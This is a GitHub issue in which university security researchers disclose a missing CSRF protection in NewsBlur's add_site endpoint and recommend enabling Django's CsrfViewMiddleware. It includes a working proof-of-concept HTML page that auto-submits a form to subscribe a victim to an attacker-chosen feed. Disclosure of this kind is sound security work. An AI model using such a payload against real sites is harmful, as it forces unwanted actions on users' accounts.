Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Security Vulnerability Report: CSRF protection missing #1879

Open
FHantke opened this issue Jul 10, 2024 · 0 comments
Open

Security Vulnerability Report: CSRF protection missing #1879

FHantke opened this issue Jul 10, 2024 · 0 comments

Comments

@FHantke
Copy link

FHantke commented Jul 10, 2024

Hello NewsBlur developers,

We are a cybersecurity research group from the CISPA Helmholtz Center for Information Security and Ca’ Foscari University of Venice. We recently conducted an analysis of the session management in web applications on GitHub as part of our research. We have discovered a security vulnerability in your code that we believe requires your attention.

Vulnerability Description:

With our analysis, we have identified that your application is not using CsrfViewMiddleware as default but setting CSRF protection for individual views. However, this excludes a number of sensitive views. For example, the add_site_authed view is not protected, allowing an attacker to craft a CSRF payload that may force a target user to automatically subscribe to a feed chosen by the attacker. This even works, although Django uses lax SameSite cookies by default, because the endpoint is implemented on top of a GET request.

Example exploit:

<html>
  <body>
    <form action="https://www.newsblur.com/api/add_site">
      <input type="hidden" name="url" value="example.org/maliccious_feed" />
      <input type="hidden" name="folder" value="river&#58;" />
      <input type="hidden" name="callback" value="xxx" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Recommendation for Mitigation:

We recommend activating Django’s CsrfViewMiddleware as it protects all endpoint by default.

https://docs.djangoproject.com/en/5.0/ref/csrf/

We hope this notification helps improve your security.

In addition to addressing this issue, we are interested in understanding how this vulnerability was introduced in the code or why it has remained unchanged. CsrfViewMiddleware is usually activated by default when you start a project. This information can provide valuable insights into common security pitfalls and help us all improve security practices in the future. Could you share any background on this aspect? We would greatly appreciate your input on this matter. Thank you!

Should you have further questions or comments on this, feel free to answer this thread or reach out to florian.hantke@cispa.de.

Kind regards,
Florian Hantke

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant